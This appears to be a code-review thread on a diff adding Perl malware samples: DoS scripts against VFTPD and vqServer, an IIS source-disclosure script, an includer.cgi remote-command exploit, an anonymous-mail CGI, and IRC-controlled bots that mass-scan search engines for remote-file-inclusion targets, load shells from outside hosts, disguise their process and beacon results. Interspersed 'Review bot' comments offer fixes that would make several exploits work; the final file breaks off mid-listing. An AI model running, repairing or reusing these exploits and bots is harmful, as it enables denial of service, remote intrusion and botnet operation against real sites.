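Review bot: The `bftelnet` handler sends the wrong data: `$telnet->open('$victim')` and `$telnet->print('$denial')` are single-quoted, so the literal strings `$victim` and `$denial` are used instead of the host and the 3090-byte buffer, and with `# use Net::Telnet;` commented out `new Net::Telnet` dies before that point anyway. Pass the variables directly, `$telnet->open($victim); $telnet->print($denial);`, and restore the `use Net::Telnet;`. The usage guard `if(!defined($args{h}) && !defined($args{t}))` only fires when both are missing, so `-h host` without `-t` silently does nothing; `||` is the intended operator. The `vulnerable` table lists ZetaMail as an SMTP server while the file header and the `zetamail` sub (port 110) treat it as POP3 — one of the two should be corrected.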

50
Perl/DoS.Perl.Vftp Normal file

@ -0,0 +1,50 @@
# Example for a possible DOS-attack against Vermillion FTP Daemon (VFTPD) v1.23.
# There need to be 504 characters to overflow Server.
# Example : Trying example.com...
# Connected to example.com.
# Escape character is '^]'.
# 220 itsme FTP Server (vftpd 1.23) ready.
# USER itsme
# PASS ******
# CWD [504 characters]
# CWD [504 characters]
# CWD [504 characters]
# Overflow
use IO::Socket;
print "Possible DOS-attack against Vermillion FTP Daemon (VFTPD) v1.23\n";
print "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
if (not $ARGV[2]) {
print "Usage: $0 [host] [user] [pass]\n\n";
exit(0);
}
sub connecthost {
$host = IO::Socket::INET->new ( Proto => "tcp",
PeerAddr => $ARGV[0],
PeerPort => "21",) or die "Can't open connection to $ARGV[0] because $!\n";
$host->autoflush(1);
}
$bufferoverflow .= "A" x 504;
print "\nOpen connection...\n";
&connecthost;
print "Sending characters...\n";
print $host "user $ARGV[1]\n";
print $host "pass $ARGV[2]\n";
print $host "cwd $bufferoverflow\n";
print $host "cwd $bufferoverflow\n";
print $host "cwd $bufferoverflow\n";
print "close connection...\n";
close $host;
print "\nTesting...\n";
&connecthost("\nThe host $ARGV[0] is vulnerable to this attack.\n");
close $host;
die "The host $ARGV[0] is not vulnerable to this attack.\n";
# by arbon(arbon@gmx.de)
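Review bot: The vulnerability verdict is never printed: `&connecthost("\nThe host $ARGV[0] is vulnerable to this attack.\n")` passes a message that `connecthost` ignores (it never reads `@_`), so when the second connect fails the script dies with the generic "Can't open connection" text and the "vulnerable" message is unreachable; only the "not vulnerable" branch can ever be shown. Let the sub accept an optional failure message and use it as the die text, keeping the generic message for the first connect. Both calls hand the socket back through the global `$host`, which is tolerable for a script this size but worth a comment.
```perl
sub connecthost {
    # Optional message to die with when the connect fails; the second call
    # passes the "vulnerable" verdict here, the first call passes nothing.
    my ($fail_msg) = @_;
    $host = IO::Socket::INET->new ( Proto => "tcp",
                                    PeerAddr => $ARGV[0],
                                    PeerPort => "21",)
        or die($fail_msg || "Can't open connection to $ARGV[0] because $!\n");
    $host->autoflush(1);
}
# … unchanged: overflow string, first connect, three CWD sends, re-test …
```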

71
Perl/DoS.Perl.Vqserver Normal file

@ -0,0 +1,71 @@
DHC Advisory
Advisory for vqServer 1.4.49
vqServer is made by vqSoft. Site: http://www.vqsoft.com
by nemesystm of the DHC
(http://dhcorp.cjb.net - auto45040@hushmail.com)
/-|=[explaination]=|-\
When sending vqServer version 1.4.49 a malformed URL request it will crash
the service. This has been verified to work on the Windows version, but
it probably is in the linux/unix version and prior versions too.
/-|=[testing it]=|-\
To test this vulnerability, send a GET request with 65000 characters.
So:
GET /AAA (hit return =)
Where AAA = 65000, seeing as Internet Explorer, nor Netscape lets you paste
that much characters in their browser fields (www.server.com/AAA) you will
have to use something like Telnet.
You can easily program something to print 65000 chars in Perl:
open (OUT, ">$ARGV[0]");
print OUT ("GET /");
print OUT ("A" x 65000);
then it's just a cut and paste.
Or you can use the example code below
/-|=[fix]=|-\
the latest edition of vqServer (1.9.47) is unaffected by this. It is available
for download at www.vqsoft.com
/-|=[notes]=|-\
PUT, POST and the Administration port do not seem to be affected by a high
amount of characters. The Windows version needed a reinstall every five
or so crashes. A reboot or total shutdown did not help.
/-|=[exploit code]=|-\
sinfony quickly wrote some code so you can see if you're vulnerable.
# DoS exploit for vqServer 1.4.49
# This vulnerability was discovered by nemesystm
# (auto45040@hushmail.com)
#
# code by: sinfony (chinesef00d@hotmail.com)
# [confess.sins.labs] (http://www.ro0t.nu/csl)
# and DHC member
#
# kiddie quote of the year:
# <gammbitr> dude piffy stfu i bet you don't even know how to exploit it
die "vqServer 1.4.49 DoS by sinfony (chinesef00d\@hotmail.com)\n
usage: $0 <host> \n"
if $#ARGV != 0;
use IO::Socket;
$host = $ARGV[0];
$port = 80;
print "Connecting to $host on port $port...\n";
$suck = IO::Socket::INET->
new(Proto=>"tcp",
PeerAddr=>$host,
PeerPort=>$port)
|| die "$host isnt a webserver you schmuck.\n";
$a = A;
$send = $a x 65000;
print "Connected, sending exploit.\n";
print $suck "GET /$send\n";
sleep(3);
print "Exploit sent. vqServer should be dead.\n";
close($suck)
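Review bot: `$a = A;` assigns a bareword (only legal because there is no `use strict`) to `$a`, which is the package global that `sort` uses for its comparator; write `my $pad = "A" x 65000;` and send that. The closing `print "Exploit sent. vqServer should be dead.\n";` is unconditional after a three-second sleep; nothing reconnects to confirm, so the line is a guess rather than a result. The advisory text above the code is carried verbatim inside the file, including its own Perl fragment (`open (OUT, ">$ARGV[0]");`), so running the file as committed fails on the prose before the `die` usage check is reached — the advisory should be a `#` comment block or a separate file.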


@ -0,0 +1,101 @@
# anonymail - fuck, i was bored like shit. napalmed.
$script_url = "/am.cgi";
$sendmail = "/usr/sbin/sendmail";
@referers = ("");
$admin = "napalmed@fuck.au";
@friends = ("");
$good_refer = 0;
if($ENV{REQUEST_METHOD} eq 'GET')
{
&print_form;
}
elsif($ENV{REQUEST_METHOD} eq 'POST')
{
foreach $referer(@referers)
{
if($ENV{HTTP_REFERER} =~ /$referer/i) { $good_refer = 1; }
}
if($good_refer != 1) { &error; }
&parse_form;
&send_mail;
}
else
{
&error;
}
sub print_form
{
print "Content-type: text/html\n\n";
print "<HTML><HEAD><TITLE>jhve elohim meth :: god is dead</TITLE></HEAD>\n";
print "<BODY><B> ANONYMOUS MAIL. FUCK YOU </B><BR>\n";
print "
<CENTER>
<FORM ACTION=\"$script_url\" METHOD=\"POST\" NAME=\"mail_form\">
<TABLE BORDER=5><TH COLSPAN=2>BITCH</TH>
<tr><td>Send To:</td><td><INPUT TYPE=\"text\" NAME=\"to\" SIZE=30></td></tr>
<tr><td>From Address:</td><td><INPUT TYPE=\"text\" NAME=\"from_addy\" SIZE=30></td></tr>
<tr><td>From Name:</td><td><INPUT TYPE=\"text\" NAME=\"from_name\" SIZE=30></td></tr>
<tr><td>Subject:</td><td><INPUT TYPE=\"text\" NAME=\"subject\" SIZE=30></td></tr>
<tr><td colspan=2>Body:<br><TEXTAREA NAME=\"body\" WRAP=VIRTUAL ROWS=3 COLS=35></TEXTAREA></td></tr>
<tr><td colspan=2 align=center><INPUT TYPE=\"submit\" VALUE=\" Send Mail \">
<INPUT TYPE=\"reset\" VALUE=\" Clear \"></TD></TR></TABLE></FORM></CENTER>\n";
print "<BR><HR><BR></BODY></HTML>\n";
exit;
}
sub send_mail
{
open (MAIL, "|$sendmail -t") || &error;
print MAIL "From: $input{'from_name'} \<$input{'from_addy'}\>\n";
print MAIL "Reply-To: $input{'from_addy'}\n";
print MAIL "X-Mailer: anonmail.bitch\n";
print MAIL "To: $input{'to'}\n";
print MAIL "Subject: $input{'subject'}\n";
print MAIL "Content-Type: text/plain; charset=us-ascii\n";
print MAIL "Content-Transfer-Encoding: 7bit\n\n";
print MAIL "$input{'body'}";
close (MAIL);
print "Content-type: text/html\n\n";
print "Below is what you sent to $input{to}\n<pre>\n";
print "From: $input{'from_name'} \<$input{'from_addy'}\>\n";
print "Reply-To: $input{'from_addy'}\n";
print "To: $input{'to'}\n";
print "Subject: $input{'subject'}\n\n";
print "$input{'body'}";
exit;
}
sub parse_form {
read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
if (length($buffer) < 5) {
$buffer = $ENV{QUERY_STRING};
}
@pairs = split(/&/, $buffer);
foreach $pair (@pairs) {
($name, $value) = split(/=/, $pair);
$value =~ tr/+/ /;
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$value =~ s/<!--(.|\n)*-->//g;
$input{$name} = $value;
}
if($input{'to'} =~ /microsoft.com/i) { &error; }
foreach $friend(@friends)
{
if($input{'to'} =~ /$friend/i) { &error; }
}
}
sub error
{
print "Content-type: text/html\n\n";
print "<BR>An error occured while processing the script.\n";
exit;
}
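Review bot: The header fields are written to `sendmail -t` without removing line breaks: `parse_form` only URL-decodes (`pack("C", hex($1))`) and strips HTML comments, so a `to`, `from_addy` or `subject` value containing `%0A` injects extra header lines (`Bcc:`, a second `To:`), and because `-t` takes recipients from the headers this also bypasses the `@friends`/`microsoft.com` deny list. Strip CR/LF from every header field before printing, e.g. `$input{$_} =~ s/[\r\n]+//g for qw(to from_addy from_name subject);`. The referer check is a no-op as configured: `@referers = ("")` makes `/$referer/i` an empty pattern, which Perl treats as "reuse the last successful match" (and matches trivially when there is none), so `$good_refer` is always set. The `open (MAIL, "|$sendmail -t")` pipe is also unchecked on `close`, so a sendmail failure is reported to the user as a sent message.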


@ -0,0 +1,85 @@
#----------------------------------------------------------------#
# [ISMyASP] #
# IIS ASP source code viewer using ISM.DLL buffer truncation bug #
# and null.htw bug #
# LoWNOISE Colombia 5/2000 #
# Efrain 'ET' Torres et@cyberspace.org #
#----------------------------------------------------------------#
# Shoutz 2 f4lc0n & M43ztr0 <-- a gnu memb. #
#----------------------------------------------------------------#
# Some f() from wwwboard.pl by S.Sparling #
#----------------------------------------------------------------#
use Socket;
$port=80;
if (!($ARGV[0])) {
print "\n[ISMyASP]\n";
print "$0 http://host/view.asp \n";
print "ET LoWNOISE Colombia.\n";
exit;
}
$url=$ARGV[0];
chop($url) if $url =~ /\n$/;
print "url: $url\n";
$remote = $url;
$remote =~ s/http\:\/\///g;
$remote =~ s/\/([^>]|\n)*//g;
print "host: $remote\n";
$path = $url;
$path =~ s/http\:\/\///g;
$path =~ s/$remote//g;
print "path: $path\n";
$spaces=230; #THIS IS THE DEFAULT VALUE FOR ISM.DLL b.t
#REMEMBER THIS ATTACK ONLY WORKS ONLY 1 TIME
#READ THE CERBERUS CISADV000327.
$submit = "GET $path";
$i=0;
while($i < $spaces)
{
$submit= "$submit%20";
$i++;
}
$submit= "$submit.htr HTTP/1.0\n\n";
print "======Trying ism.dll buffer truncation...\n";
print "submit: $submit\n\n";
&post_message;
print "======Trying null.htw...\n";
$submit="GET /null.htw?CiWebHitsFile=$path%20&CiRestriction=none&CiHiliteType=Full HTTP/1.0\n\n";
print "submit: $submit\n\n";
&post_message;
sub post_message
{
if ($port =~ /\D/) { $port = getservbyname($port, 'tcp'); }
die("No port specified.") unless $port;
$iaddr = inet_aton($remote) || die("Failed to find host: $remote");
$paddr = sockaddr_in($port, $iaddr);
$proto = getprotobyname('tcp');
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die("Failed to open socket: $!");
connect(SOCK, $paddr) || die("Unable to connect: $!");
send(SOCK,$submit,0);
printf "\n======Waiting for reply [pray]....\n\n";
while(<SOCK>) {
print $_;
}
close(SOCK);
}
print "\n\n======THE END. [LoWNOISE]\n";
exit;
#:) narco.guerrilla&gov.sucks.co (huge :x to PO-K)
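Review bot: `$path =~ s/$remote//g;` interpolates the hostname into the regex unescaped, so the dots in `www.host.com` match any character and any similar sequence elsewhere in the path is removed too; use `s/\Q$remote\E//` without `/g`, since the host occurs once at the start. `$remote =~ s/\/([^>]|\n)*//g;` keeps an explicit `:port` in `$remote`, so a URL such as `http://host:8080/x.asp` makes `inet_aton("host:8080")` fail while `$port` stays 80; either parse the port or document that only port 80 is supported. `send(SOCK, $submit, 0)` is unchecked — `or die "send: $!"` would distinguish a reset connection from an empty reply. The `%20` padding loop is simply `'%20' x $spaces`.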


@ -0,0 +1,85 @@
#
# [K-C0d3r] Includer.cgi 1.0 remote command execution [K-C0d3r]
#
# C0d3d By K-C0d3r, a www.x0n3-h4ck.org friend!
#
# I think the bug was discovered by Francisco Alisson.
#
# Greetz to: mZ, CorryL, Expanders, SiNaPsE, off, rikky, milw0rm.
#
# F**K o*f to all RxBot kiddies as e*****t, G***n, d***b.
#
##########################################################################
# [kc@K-C0d3r xpl]$ perl KCincluder.pl 127.0.0.1 /cgi-bin/includer.cgi 1
# [K-C0d3r] Includer.cgi Remote Command Execution Exploit [K-C0d3r]
# [?] Insert command: id
# [+] Conecting to 127.0.0.1
# [+] Connected to 127.0.0.1
# [+] Injecting command ...
# uid=500(kc) gid=500(kc) gruppi=500(kc)
# [kc@K-C0d3r xpl]$
##########################################################################
use IO::Socket;
sub Usage {
print STDERR "Usage:\nKCinc-xpl.pl <www.victim.com> </path/to/includer.cgi> <exploitation_type>.\n";
print STDERR "Exploitation Types:\n \t\t1: includer.cgi?|command|\n \t\t2: includer.cgi?template=|command|\n\n";
exit;
}
if (@ARGV < 3)
{
Usage();
}
$host = @ARGV[0];
$path = @ARGV[1];
print "[K-C0d3r] Includer.cgi Remote Command Execution Exploit [K-C0d3r]\n";
print "[?] Insert command: ";
$command = <STDIN>;
$type = @ARGV[2];
if ($type > 2)
{
Usage();
}
print "[+] Conecting to $host\n";
if ($type = 1)
{
$injection = "$host$path?|$command|";
$socket = new IO::Socket::INET (PeerAddr => "$host",
PeerPort => 80,
Proto => 'tcp');
die unless $socket;
print "[+] Connected to $host\n";
print "[+] Injecting command ...\n";
print $socket "GET http://$injection HTTP/1.1\nHost: $host\n\n";
while (<$socket>)
{
print $_;
exit;
}
}
if ($type = 2)
{
$injection = "$host$path?template=|$command|";
$socket = new IO::Socket::INET (PeerAddr => "$host",
PeerPort => 80,
Proto => 'tcp');
die unless $socket;
print "[+] Connected to $host\n";
print "[+] Injecting command\n";
print $socket "GET http://$injection HTTP/1.1\nHost: $host\n\n";
while (<$socket>)
{
print $_;
exit;
}
}
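Review bot: `if ($type = 1)` and `if ($type = 2)` are assignments, not comparisons, so both conditions are always true and both exploitation types are sent on every run regardless of the third argument; use `==`. `$command = <STDIN>;` is never chomped, so its trailing newline lands inside `GET http://$injection HTTP/1.1` and splits the request line, leaving the Host header outside the request; add `chomp($command);` and URL-encode the command (`|`, spaces) before placing it in the URL. `@ARGV[0]`/`@ARGV[1]`/`@ARGV[2]` are one-element slices where `$ARGV[n]` is meant — harmless, but it warns. The response loop `while (<$socket>) { print $_; exit; }` exits after the first line, so only the status line is ever shown, not the command output the usage example promises.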

248
Perl/HackTool.Perl.IrBot.c Normal file

@ -0,0 +1,248 @@
#################################################################################################################################################
#
# RFi Scanner 2007 by Morgan..
#
# <@Morgan> !scan page.php?id= "Powered by RGameScript"
# <NewScan_Google> [Scan] Started: page.php?id= - Dork: "Powered by RGameScript" Engine: Google
# <NewScan_Google> [Scan] Google Found: 1656 Sites!
# <NewScan_Google> [Scan] Cleaned results: 36 Sites!
# <NewScan_Google> [Scan] Exploting started!
# <NewScan_Google> [SafeON] [Sys Linux] [Free 36.55 GB ] http://gry.nakazdytemat.pl/page.php?id=http://usuarios.arnet.com.ar/larry123/cmd.jpg?
# <NewScan_Google> [Information] Linux blackhawk.avx.pl 2.6.19.2 #4 SMP Fri Feb 2 11:51:02 CET 2007 i686
# <NewScan_Google> [SafeOFF] [Sys Linux] [Free 26.26 GB ] http://allgamesallfree.org/page.php?id=http://usuarios.arnet.com.ar/larry123/cmd.jpg?
# <NewScan_Google> [Information] Linux games.allgamesallfree.com 2.6.9-55.0.2.ELsmp #1 SMP Tue Jun 26 14:30:58 EDT 2007 i686
# <NewScan_Google> [Scan] Scan Finished "Powered by RGameScript"
#
#
# Enjoy!
# /Morgan
#
# irc.realworm.net - #Morgan
#################################################################################################################################################
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
###############CONFIGURATION###################
my $processo = "/usr/local/apache/bin/nscan -DSSL";
my $printcmd="http://www.animedinasty.org/cmd/info.jpg?"; #<---- Change this for your CMD
my $server="irc.x-reaction.net";
my $porta="6667";
my $nick="x____H264____x";
my $chan="#a";
###############END OF CONFIGURATION############
my $verbot = "2.0";
my $cmd="http://www.greenkorea.ph/bbs/data/_metal/safe.txt?"; #Never change this
my $pid=fork;
exit if $pid;
$0="$processo"."\0"x16;
my $sk = IO::Socket::INET->new(PeerAddr=>"$server",PeerPort=>"$porta",Proto=>"tcp") or die "Can not connect on server!\n";
$sk->autoflush(1);
print $sk "NICK $nick\r\n";
print $sk "USER Google 8 * : Google : google@google.it : Google :Google\r\n";
print $sk "JOIN $chan\r\n";
print $sk "PRIVMSG $chan :3,1[9S3,1can-Bot] Scan is 3ON1 : 9!scan <bug> <dork>\r\n";
while($line = <$sk>){
$line =~ s/\r\n$//;
if ($line=~ /^PING \:(.*)/)
{
print "PONG :$1";
print $sk "PONG :$1";
}
if ($line=~ /PRIVMSG $chan :.deletebot/){
stampa($sk, "QUIT");
}
if ($line=~ /PRIVMSG $chan :!scan\s+(.*?)\s+(.*)/){
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my $bug=$1;
my $dork=$2;
my $contatore=0;
my ($type,$space);
my %hosts;
stampa($sk, "PRIVMSG $chan :3,1[9S3,1can] Started:9 $bug 3 Dork:9 $dork 3Engine:9 Google ");
my @glist=&google($dork);
stampa($sk, "PRIVMSG $chan :3,1[9S3,1can] Google Found:9 ".scalar(@glist)."3 Sites!");
push(my @tot, @glist);
my @puliti=&unici(@tot);
stampa($sk, "PRIVMSG $chan :3,1[9S3,1can] Cleaned results: 9 ".scalar(@puliti)."3 Sites!");
stampa($sk, "PRIVMSG $chan :3,1[9S3,1can] Exploting started! ");
my $uni=scalar(@puliti);
foreach my $sito (@puliti)
{
$contatore++;
if ($contatore %30==0){
}
if ($contatore==$uni-1){
stampa($sk, "PRIVMSG $chan :3,1[9S3,1can] Scan Finished9 $dork");
}
my $test="http://".$sito.$bug.$cmd."?";
my $print="http://".$sito.$bug.$printcmd."?";
my $vuln="http://".$sito.$bug."";
my $req=HTTP::Request->new(GET=>$test);
my $ua=LWP::UserAgent->new();
$ua->timeout(5);
my $response=$ua->request($req);
if ($response->is_success) {
my $re=$response->content;
if($re =~ /31337/ && $re =~ /uid=/){
my $hs=geths($print); $hosts{$hs}++;
if($hosts{$hs}=="1"){
$x=os($test);
($type,$space,$ker)=split(/\,/,$x);
stampa($sk, "PRIVMSG $chan :3,1[9S3afe9OFF3] 3,1[9S3ys9 ".$type."3] 3,1[9F3ree9 ".$space." 9] $print ");
stampa($sk, "PRIVMSG $chan :3,1[9I3nformation3]9 $ker  ");
checksafemode("$print");}}
elsif($re =~ /31337/)
{
my $hs=geths($print); $hosts{$hs}++;
if($hosts{$hs}=="1"){
$x=os($test);
($type,$space,$ker)=split(/\,/,$x);
stampa($sk, "PRIVMSG $chan :3,1[9S3afe14ON3] 3,1[9S3ys14 ".$type."3] 3,1[9F3ree14 ".$space." 3]14 $print ");
stampa($sk, "PRIVMSG $chan :3,1[9I3nformation3]14 $ker  ");
checksafemode("$print");}}
}}}
exit;
}}}
sub stampa()
{
if ($#_ == '1') {
my $sk = $_[0];
print $sk "$_[1]\n";
} else {
print $sk "$_[0]\n";
}}
sub os(){
my $sito=$_[0];
my $Res=query($sito);
my $type;
my $space;
my $ker;
my $str;
while($Res=~m/<br>OSTYPE:(.+?)\<br>/g){
$type=$1;
}
while($Res=~m/<br>Kernel:(.+?)\<br>/g){
$ker=$1;
}
while($Res=~m/<br>Free:(.+?)\<br>/g){
$space=$1;
}
$str=$type.",".$space.",".$ker;
return $str;
}
sub google(){
my @lst;
my $key = $_[0];
for($b=0;$b<=1000;$b+=100){
my $Go=("http://www.google.it/search?hl=it&q=".key($key)."&num=100&filter=0&start=".$b);
my $Res=query($Go);
while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
if ($1 !~ /google/){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}}}
return @lst;
}
sub links()
{
my @l;
my $link=$_[0];
my $host=$_[0];
my $hdir=$_[0];
$hdir=~s/(.*)\/[^\/]*$/\1/;
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$host.="/";
$link.="/";
$hdir.="/";
$host=~s/\/\//\//g;
$hdir=~s/\/\//\//g;
$link=~s/\/\//\//g;
push(@l,$link,$host,$hdir);
return @l;
}
sub geths(){
my $host=$_[0];
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
return $host;
}
sub key(){
my $chiave=$_[0];
$chiave =~ s/ /\+/g;
$chiave =~ s/:/\%3A/g;
$chiave =~ s/\//\%2F/g;
$chiave =~ s/&/\%26/g;
$chiave =~ s/\"/\%22/g;
$chiave =~ s/,/\%2C/g;
$chiave =~ s/\\/\%5C/g;
return $chiave;
}
sub query($){
my $url=$_[0];
$url=~s/http:\/\///;
my $host=$url;
my $query=$url;
my $page="";
$host=~s/href=\"?http:\/\///;
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query=~s/$host//;
if ($query eq "") {$query="/";};
eval {
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
close($sock);
};
return $page;
}
sub checksafemode($){
my $url=$_[0];
$url=~s/http:\/\///;
my $host=$url;
my $query=$url;
my $page="";
$query=~s/$host//;
if ($query eq "") {$query="/";};
eval {
my $sock = IO::Socket::INET->new(PeerAddr=>"tckct.co.uk",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET /logfiles/CDPW3U1032/safe.php?url=$query HTTP/1.0\r\nHost: tckct.co.uk\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
close($sock);
};
}
sub unici{
my @unici = ();
my %visti = ();
foreach my $elemento ( @_ )
{
next if $visti{ $elemento }++;
push @unici, $elemento;
}
return @unici;
}
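Review bot: `checksafemode` is a beacon, not a safe-mode check: it connects to the hard-coded host `tckct.co.uk`, sends every exploitable URL found as `GET /logfiles/CDPW3U1032/safe.php?url=$query`, and discards the reply, so whoever controls that host receives every result this bot produces; that host/path and `$0 = "/usr/local/apache/bin/nscan -DSSL"` (disguising the process as Apache) are the indicators worth documenting at the top of the file. `$hosts{$hs}=="1"` compares numerically against a string literal; `== 1` is what is meant. `if ($contatore %30==0){ }` is an empty block, and `$contatore==$uni-1` emits "Scan Finished" one site early and never when there is a single result. `query` also hides failures — `eval { … or return; }` turns a refused connection into an empty page, so a timeout and a non-vulnerable host are indistinguishable to the `31337`/`uid=` test.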

438
Perl/HackTool.Perl.IrBot.d Normal file

@ -0,0 +1,438 @@
#Mic22 Is Here!
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
my $processo = "/usr/local/apache/bin/httpd -DSSL";
my $cmd="http://by-gardenfox.t35.com/c99.txt?";
my $server="irc.milw0rm.com";
my $porta="6667";
my $nick="[ScaN-RoX]";
my $canale="#army";
my $verbot = "6.51";
my @adms=("joiner");
my $pid=fork;
exit if $pid;
$0="$processo"."\0"x16;
my $sk = IO::Socket::INET->new(PeerAddr=>"$server",PeerPort=>"$porta",Proto=>"tcp") or die "Can not connect on server!\n";
$sk->autoflush(1);
print $sk "NICK $nick\r\n";
print $sk "USER Shinchi 13 * : henca : henca@prohosts.org : Shinchi :henca\r\n";
print $sk "JOIN $canale\r\n";
while($line = <$sk>){
$line =~ s/\r\n$//;
if ($line=~ /^PING \:(.*)/)
{
print "PONG :$1";
print $sk "PONG :$1";
}
if ($line=~ /PRIVMSG $canale :.out/){
stampa($sk, "QUIT");
}
if ($line=~ /PRIVMSG $canale :.help/){
stampa($sk, "PRIVMSG $canale :12.::[13Bantuan] 6Scanner RFI Ver $verbot (C)Mic22 , 3Color By 10Shinchi12::.");
stampa($sk, "PRIVMSG $canale :12.::[13Bantuan] 2ketik 4.scan Bug Dork 12::.");
stampa($sk, "PRIVMSG $canale :12.::[13Bantuan] 2Ketik 7.engine 2Untuk melihat searce engine yang digunakan 12::.");
stampa($sk, "PRIVMSG $canale :12.::[13bantuan] 2Ketik 7.mwultimi 2Untuk Melihat Bug di milworm 12::.");
stampa($sk, "PRIVMSG $canale :12.::[13Bantuan] 2Ketik 7.info 2Untuk Melihat status Bot/System 12::.");
stampa($sk, "PRIVMSG $canale :12.::[13Bantuan] 2Ketik 7.out 2Untuk Matikan Bot 12::.");
}
if ($line=~ /PRIVMSG $canale :.info/){
my $sysos = `uname -sr`;
my $uptime = `uptime`;
if ($sysos =~ /freebsd/i ) {
$sysname = `hostname`;
$memory = `expr \`cat /var/run/dmesg.boot | grep "real memory" | cut -f5 -d" "\` \/ 1048576`;
$swap = `$toploc | grep -i swap | cut -f2 -d" " | cut -f1 -d"M"`;
chomp($memory);
chomp($swap);
}
elsif ( $sysos =~ /linux/i ) {
$sysname = `hostname -f`;
$memory = `free -m |grep -i mem | awk '{print \$2}'`;
$swap = `free -m |grep -i swap | awk '{print \$2}'`;
chomp($swap);
chomp($memory);
}
else {
$sysname ="No Found";;
$memory ="No found";
$swap ="No Found";
}
$uptime=~s/\n//g;
$sysname=~s/\n//g;
$sysos=~s/\n//g;
stampa($sk, "PRIVMSG $canale :12.::[13Info] Server: $server :| - $porta12::.");
stampa($sk, "PRIVMSG $canale :12.::[13Info] SO/Hostname:12 $sysos - $sysname12::.");
stampa($sk, "PRIVMSG $canale :12.::[13Info] Process/PID:12 $processo - $$12::.");
stampa($sk, "PRIVMSG $canale :12.::[13Info] Uptime:12 $uptime12::.");
stampa($sk, "PRIVMSG $canale :12.::[13Info] Memory/Swap:12 $memory - $swap12::.");
stampa($sk, "PRIVMSG $canale :12.::[13Info] Perl Version/BOT:12 $] - $verbot12::.");
}
if ($line=~ /PRIVMSG $canale :.engine/){
stampa($sk, "PRIVMSG $canale :12.::[13Engine] 2Google, Yahoo, MsN, Altavista, Libero, AllTheWeb, AsK, UoL, AoL 12::.");
}
if ($line=~ /PRIVMSG $canale :.mwultimi/){
my @ltt=();
my @bug=();
my $x;
my $page="";
my $socke = IO::Socket::INET->new(PeerAddr=>"milw0rm.com",PeerPort=>"80",Proto=>"tcp") or return;
print $socke "GET http://milw0rm.com/rss.php HTTP/1.0\r\nHost: milw0rm.com\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$socke>;
$page="@r";
close($socke);
while ($page =~ m/<title>(.*)</g){
$x = $1;
if ($x =~ /\&lt\;/) {
$x =~ s/\&lt\;/</g;
}
if ($x !~ /milw0rm/) {
push (@bug,$x);
}}
while ($page =~ m/<link.*expl.*([0-9]...)</g) {
if ($1 !~ m/milw0rm.com|exploits|en/){
push (@ltt,"http://www.milw0rm.com/exploits/$1 ");
}}
stampa($sk, "PRIVMSG $canale :12.::[13MillW0rm] 7Last Bug di milw0rm 12::.");
foreach $x (0..(@ltt - 1)) {
stampa($sk, "PRIVMSG $canale :12.::[13MillW0rm] list Bug Milw0rm $bug[$x] - $ltt[$x] 12::.");
sleep 1;
}}
if ($line=~ /PRIVMSG $canale :.scan\s+(.*?)\s+(.*)/){
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my $bug=$1;
my $dork=$2;
my $contatore=0;
my ($type,$space);
my %hosts;
stampa($sk, "PRIVMSG $canale :12.::[13Dork] $dork12::.");
stampa($sk, "PRIVMSG $canale :12.::[13Bug] $bug12::.");
stampa($sk, "PRIVMSG $canale :12.::[13Loading] 2Tunggu yach.. Yayang Lagi Mulai neh!12::.");
stampa($sk, "PRIVMSG $canale :12.::[13Google] Sabar yach Say.. Lagi scan nih!12::.");
my @glist=&google($dork);
stampa($sk, "PRIVMSG $canale :12.::[13Yahoo] Sabar yach Say.. Lagi scan nih!12::.");
my @ylist=&yahoo($dork);
stampa($sk, "PRIVMSG $canale :12.::[13Msn] Sabar yach Say.. Lagi scan nih!12::.");
my @mlist=&msn($dork);
stampa($sk, "PRIVMSG $canale :12.::[13Altavista] Sabar yach Say.. Lagi scan nih!12::.");
my @alist=&altavista($dork);
stampa($sk, "PRIVMSG $canale :12.::[13Libero] Sabar yach Say.. Lagi scan nih!12::.");
my @llist=&libero($dork);
stampa($sk, "PRIVMSG $canale :12.::[13AllTheWeb] Sabar yach Say.. Lagi scan nih!12::.");
my @allist=&alltheweb($dork);
stampa($sk, "PRIVMSG $canale :12.::[13AsK] Sabar yach Say.. Lagi scan nih!12::.");
my @asklist=&ask($dork);
stampa($sk, "PRIVMSG $canale :12.::[13UoL] Sabar yach Say.. Lagi scan nih!12::.");
my @uollist=&uol($dork);
stampa($sk, "PRIVMSG $canale :12.::[13AoL] Sabar yach Say.. Lagi scan nih!12::.");
my @aollist=&aol($dork);
stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] 2Lagi Scan untuk kamu say [9Dork] $dork12::.");
stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] Google ".scalar(@glist)." Situs!12::.");
stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] Yahoo ".scalar(@ylist)." Situs!12::.");
stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] MsN ".scalar(@mlist)." Situs!12::.");
stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] Altavista ".scalar(@alist)." Situs!12::.");
stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] Libero ".scalar(@llist)." Situs!12::.");
